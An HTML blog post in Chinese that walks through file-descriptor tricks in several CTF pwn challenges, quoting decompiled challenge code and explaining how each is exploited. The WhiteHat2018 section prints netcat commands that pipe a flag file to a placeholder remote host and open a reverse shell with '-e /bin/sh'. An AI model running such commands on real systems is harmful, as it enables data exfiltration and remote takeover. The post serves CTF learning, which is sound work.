<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Play with file descriptor(Ⅲ) - localhost - Done with development, it&#39;s time to pwn.</title>
  

<meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta name="MobileOptimized" content="width"/>
<meta name="HandheldFriendly" content="true"/>


<meta name="applicable-device" content="pc,mobile">

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="mobile-web-app-capable" content="yes">

<meta name="author" content="M4x" />
  <meta name="description" content="接下来以一些 pwnable 题目为例分析一些 fd tricks，如果以后遇到新的操作会继续更新。 同样感谢大佬们的无私分享。 level 0: pwnable.kr - fd 1 2 3 4 5 6 7 8 9 10 11 12 13" />







<meta name="generator" content="Hugo 0.75.1" />


<link rel="canonical" href="https://bash-c.github.io/post/play-with-file-descriptor-3/" />



<link rel="icon" href="/favicon.ico" />











<link rel="stylesheet" href="/sass/jane.min.19ae5a432863a072ec64433bb1020bd6d3401129f87d6f2ad5af3bcfd84168a1.css" integrity="sha256-Ga5aQyhjoHLsZEM7sQIL1tNAESn4fW8q1a87z9hBaKE=" media="screen" crossorigin="anonymous">





<meta property="og:title" content="Play with file descriptor(Ⅲ)" />
<meta property="og:description" content="接下来以一些 pwnable 题目为例分析一些 fd tricks，如果以后遇到新的操作会继续更新。 同样感谢大佬们的无私分享。 level 0: pwnable.kr - fd 1 2 3 4 5 6 7 8 9 10 11 12 13" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://bash-c.github.io/post/play-with-file-descriptor-3/" />
<meta property="article:published_time" content="2018-09-12T15:30:01+08:00" />
<meta property="article:modified_time" content="2018-09-12T15:30:01+08:00" />
<meta itemprop="name" content="Play with file descriptor(Ⅲ)">
<meta itemprop="description" content="接下来以一些 pwnable 题目为例分析一些 fd tricks，如果以后遇到新的操作会继续更新。 同样感谢大佬们的无私分享。 level 0: pwnable.kr - fd 1 2 3 4 5 6 7 8 9 10 11 12 13">
<meta itemprop="datePublished" content="2018-09-12T15:30:01+08:00" />
<meta itemprop="dateModified" content="2018-09-12T15:30:01+08:00" />
<meta itemprop="wordCount" content="4201">



<meta itemprop="keywords" content="file-descriptor,pwn,os," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Play with file descriptor(Ⅲ)"/>
<meta name="twitter:description" content="接下来以一些 pwnable 题目为例分析一些 fd tricks，如果以后遇到新的操作会继续更新。 同样感谢大佬们的无私分享。 level 0: pwnable.kr - fd 1 2 3 4 5 6 7 8 9 10 11 12 13"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->




</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo"># </a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/">cd ~</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/post/">ls -l /post</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/tags/">less /tags</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/categories/">tree /categories</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/link/">ping friends</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/aboutme/">whoami</a>
          
        
      </li>
    
  </ul>
</nav>


  
    






  <link rel="stylesheet" href="/lib/photoswipe/photoswipe.min.css" />
  <link rel="stylesheet" href="/lib/photoswipe/default-skin/default-skin.min.css" />




<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>

  

  

  <header id="header" class="header container">
    <div class="logo-wrapper">
  <a href="/" class="logo">
    
      # 
    
  </a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/">cd ~</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/post/">ls -l /post</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/tags/">less /tags</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/categories/">tree /categories</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/link/">ping friends</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/aboutme/">whoami</a>
          

        

      </li>
    
    
  </ul>
</nav>

  </header>

  <div id="mobile-panel">
    <main id="main" class="main bg-llight">
      <div class="content-wrapper">
        <div id="content" class="content container">
          <article class="post bg-white">
    
    <header class="post-header">
      <h1 class="post-title">Play with file descriptor(Ⅲ)</h1>
      
      <div class="post-meta">
        <time datetime="2018-09-12" class="post-time">
          2018-09-12
        </time>
        <div class="post-category">
            <a href="https://bash-c.github.io/categories/how2/"> how2 </a>
            <a href="https://bash-c.github.io/categories/writeup/"> writeup </a>
            
          </div>
        <span class="more-meta"> 4201 words </span>
          <span class="more-meta"> 9 min read </span>

        
        
          <span id="busuanzi_container_page_pv">
            | 阅读 <span id="busuanzi_value_page_pv"></span>
          </span>
        

        
        
      </div>
    </header>

    
    
<div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Table of Contents</h2>
  <div class="post-toc-content">
    <nav id="TableOfContents">
  <ul>
    <li><a href="#level-0-pwnablekr---fd">level 0: pwnable.kr - fd</a></li>
    <li><a href="#level-1-wdb2018_impossible">level 1: WDB2018_impossible</a></li>
    <li><a href="#level-2-whitehat2018---pwn3">level 2: Whitehat2018 - pwn3</a></li>
    <li><a href="#level-3-tokyowestern2018---load">level 3: TokyoWestern2018 - load</a>
      <ul>
        <li><a href="#ropchain">ropchain</a></li>
        <li><a href="#reverse-shell">reverse shell</a></li>
        <li><a href="#reverse-shell-原理">reverse shell 原理</a></li>
      </ul>
    </li>
    <li><a href="#level-4-hctf2018---the_end">level 4: HCTF2018 - the_end</a></li>
    <li><a href="#references">References</a></li>
  </ul>
</nav>
  </div>
</div>

    
    <div class="post-content">
      <p>接下来以一些 pwnable 题目为例分析一些 fd tricks，如果以后遇到新的操作会继续更新。
同样感谢大佬们的无私分享。</p>
<h2 id="level-0-pwnablekr---fd">level 0: pwnable.kr - fd</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="n">fd</span><span class="err">@</span><span class="nl">ubuntu</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">cat</span> <span class="n">fd</span><span class="p">.</span><span class="n">c</span>
<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span><span class="cp"></span><span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[],</span> <span class="kt">char</span><span class="o">*</span> <span class="n">envp</span><span class="p">[]){</span>
	<span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="o">&lt;</span><span class="mi">2</span><span class="p">){</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">&#34;pass argv[1] a number</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="p">)</span> <span class="o">-</span> <span class="mh">0x1234</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">len</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
	<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="s">&#34;LETMEWIN</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">)){</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">&#34;good job :)</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
		<span class="n">system</span><span class="p">(</span><span class="s">&#34;/bin/cat flag&#34;</span><span class="p">);</span>
		<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">&#34;learn about Linux file IO</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

<span class="p">}</span>

</code></pre></td></tr></table>
</div>
</div><p>有了前两篇的基础，这个就很简单了，只需要控制 read 的 第一个参数是 0 即可，当 fd = 0时，read 将会从 0 号文件，此时即为从 stdin 读取输入，接下来输入 &ldquo;LETMEWIN\n&rdquo; 即可。</p>
<h2 id="level-1-wdb2018_impossible">level 1: WDB2018_impossible</h2>
<p><a href="https://github.com/0x01f/pwn_repo/tree/master/WDB2018_impossible">binary &amp; exp here</a></p>
<p>我们只分析与 fd 有关的部分</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C">  <span class="n">memset</span><span class="p">(</span><span class="n">secret_random</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span>
  <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">secret_random</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Input your secret code:&#34;</span><span class="p">,</span> <span class="n">secret_random</span><span class="p">);</span>
  <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">memcmp</span><span class="p">(</span><span class="n">secret_random</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">)</span> <span class="p">)</span>
  <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Amazing! How can u know the secret code?&#34;</span><span class="p">);</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Ok,u are the boss, u can do anything u want&#34;</span><span class="p">);</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;But u should be quiet about this, because this is illegal&#34;</span><span class="p">);</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;So...Close ur mouth...&#34;</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">qmemcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">bored_buf</span><span class="p">,</span> <span class="mh">0x1000uLL</span><span class="p">);</span>
  <span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>仔细看这段代码，open(&quot;/dev/urandom&quot;, 0); 后并没有对应的 close 操作。
因此如果重复运行这段代码，fd 会一直增加，到达该用户所能承受的最大量后（可以使用 <code>ulimit -a</code> 查看），下一次 open(&quot;/dev/urandom&quot;, 0); 就会失败，导致 read(fd, secret_random, 8uLL); 读了空数据，我们只需要输入 <code>\0</code> 即可通过 memcmp 的验证；</p>
<p>还有一点需要注意，这道题目随后关闭了 stdin (close(0))，因此即使我们能 get shell，我们的输入也不会被接受。但幸运的是题目只关闭了 stdin，stdout 和 stderr 还是可以用的，因此思路就有很多了，比如直接构造一段 <code>open(&quot;./flag&quot;, 0); read(0, addr, 0x100); puts(addr)</code> 的 ropchain 就可以得到 flag （因为 close(0)， open(&quot;./flag&quot;, 0) 返回的 fd 将为 0)。</p>
<p>类似的题目还有 pwnable.kr - otp</p>
<h2 id="level-2-whitehat2018---pwn3">level 2: Whitehat2018 - pwn3</h2>
<p><a href="https://github.com/0x01f/pwn_repo/tree/master/WhiteHat2018_pwn03">binary &amp; exp here</a></p>
<p>同样只分析与 fd 有关的部分，通过 ret2vsyscall 获得一次任意命令执行的机会后，剩下的目的就是如何获取 flag 了</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">echo</span><span class="p">()</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// ST0C_4
</span><span class="c1"></span>  <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-E4h]
</span><span class="c1"></span>  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">216</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-E0h]
</span><span class="c1"></span>  <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+E8h] [rbp-8h]
</span><span class="c1"></span>
  <span class="n">v3</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
  <span class="n">v0</span> <span class="o">=</span> <span class="n">v1</span> <span class="o">+</span> <span class="mi">32</span><span class="p">;</span>
  <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v0</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Echo machine: &#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
  <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v0</span><span class="p">);</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
  <span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">deleteyourevilstring</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>这道题目的 stdin 和 stdout 都被关闭了，但因为我们有一次任意命令执行的机会，至少有以下三种方法获得 flag:</p>
<ul>
<li>利用 stderr， 执行 <code>sh ./flag</code> 。当 shell 检测到 flag 的内容不是合法的 shell 指令时，会通过 stderr 将 flag 内容打印到显示屏上</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> sh ./flag 
./flag: 1: ./flag: flag<span class="o">{</span>this_is_flag<span class="o">}</span>: not found
</code></pre></td></tr></table>
</div>
</div><ul>
<li>利用 pipe，前两篇提到 pipe 也是一种文件，虽然 stdin 和 stdout 被关闭了，但我们任然可以通过执行命令建立 pipe，利用 pipe 将 flag 内容发送到公网 vps，在 vps 上监听即可</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> cat ./flag<span class="p">|</span> nc your_ip your_port
......
On vps:
ubuntu@VM-61-71-ubuntu:~$ nc -lvp your_port
Listening on <span class="o">[</span>0.0.0.0<span class="o">]</span> <span class="o">(</span>family 0, port ????<span class="o">)</span>
Connection from <span class="o">[</span>1.202.222.147<span class="o">]</span> port ???? <span class="o">[</span>tcp/*<span class="o">]</span> accepted <span class="o">(</span>family 2, sport 47042<span class="o">)</span>
flag<span class="o">{</span>this_is_flag<span class="o">}</span>
</code></pre></td></tr></table>
</div>
</div><ul>
<li>建立一个 reverse shell，reverse shell 的原理完全可以另开一篇 post 介绍，本篇只会在最后简单介绍其原理，更详细的可以看 reference。</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> nc -e /bin/sh your_ip your_port
......

On vps:
ubuntu@VM-61-71-ubuntu:~$ nc -lvp your_port
Listening on <span class="o">[</span>0.0.0.0<span class="o">]</span> <span class="o">(</span>family 0, port ????<span class="o">)</span>
Connection from <span class="o">[</span>1.202.222.147<span class="o">]</span> port ???? <span class="o">[</span>tcp/*<span class="o">]</span> accepted <span class="o">(</span>family 2, sport 47442<span class="o">)</span>
ls
flag
libc-2.27.i64
libc-2.27.so
onehit
onehit.i64
solve.py
<span class="nb">pwd</span>
/home/m4x/pwn_repo/WhiteHat2018_pwn03
id
<span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>m4x<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>m4x<span class="o">)</span> <span class="nv">组</span><span class="o">=</span>1000<span class="o">(</span>m4x<span class="o">)</span>,7<span class="o">(</span>lp<span class="o">)</span>,27<span class="o">(</span>sudo<span class="o">)</span>,100<span class="o">(</span>users<span class="o">)</span>,109<span class="o">(</span>netdev<span class="o">)</span>,113<span class="o">(</span>lpadmin<span class="o">)</span>,117<span class="o">(</span>scanner<span class="o">)</span>,124<span class="o">(</span>sambashare<span class="o">)</span>,127<span class="o">(</span>docker<span class="o">)</span>

</code></pre></td></tr></table>
</div>
</div><p>类似的题目有 0CTF2018 的 babystack</p>
<h2 id="level-3-tokyowestern2018---load">level 3: TokyoWestern2018 - load</h2>
<p><a href="https://github.com/0x01f/pwn_repo/tree/master/TokyoWesterns2018_load">bianry &amp; exp here</a></p>
<p>这道题目用到了很多 fd 的知识</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">char</span> <span class="n">a1a</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-30h]
</span><span class="c1"></span>  <span class="kr">__int64</span> <span class="n">size</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-10h]
</span><span class="c1"></span>  <span class="n">__off_t</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h]
</span><span class="c1"></span>
  <span class="n">set_buffer</span><span class="p">();</span>
  <span class="n">_printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Load file Service</span><span class="se">\n</span><span class="s">Input file name: &#34;</span><span class="p">);</span>
  <span class="n">get_str</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span>
  <span class="n">_printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input offset: &#34;</span><span class="p">);</span>
  <span class="n">offset</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span>
  <span class="n">_printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input size: &#34;</span><span class="p">);</span>
  <span class="n">size</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span>
  <span class="n">load_file</span><span class="p">(</span><span class="n">a1a</span><span class="p">,</span> <span class="n">filename</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
  <span class="n">close_all</span><span class="p">();</span>
  <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">load_file</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">a1</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a2</span><span class="p">,</span> <span class="n">__off_t</span> <span class="n">a3</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a4</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kr">__int64</span> <span class="n">nbytes</span><span class="p">;</span> <span class="c1">// [rsp+0h] [rbp-30h]
</span><span class="c1"></span>  <span class="n">__off_t</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-28h]
</span><span class="c1"></span>  <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="c1">// [rsp+2Ch] [rbp-4h]
</span><span class="c1"></span>
  <span class="n">offset</span> <span class="o">=</span> <span class="n">a3</span><span class="p">;</span>
  <span class="n">nbytes</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
  <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">a2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span> <span class="n">fd</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span>
  <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;You can&#39;t read this file...&#34;</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">else</span>
  <span class="p">{</span>
    <span class="n">lseek</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">nbytes</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">)</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Load file complete!&#34;</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">close_all</span><span class="p">()</span>
<span class="p">{</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>栈溢出的漏洞很好发现，但关键是我们只有打开远程文件，并从文件中读取内容的能力。根据一切皆文件的思想，如果打开 <code>/proc/self/fd/0</code> ，在 load_file() 中就相当于 read(3, a1, nbytes)，但注意此时的 3 是 stdin，也就是说可以通过打开 /proc/self/fd/0 ，并从 stdin 读入数据来控制缓冲区内容。</p>
<p>那么我们要怎么利用呢？分析两种方法。</p>
<h3 id="ropchain">ropchain</h3>
<h4 id="pty-和-pts">pty 和 pts</h4>
<p>先介绍一下什么是 pty 和 pts。我们已经知道 fd 指向被打开的文件，那么我们看一下 stdin，stdout 和 stderr 指向什么</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span></code></pre></td>
<td class="lntd">
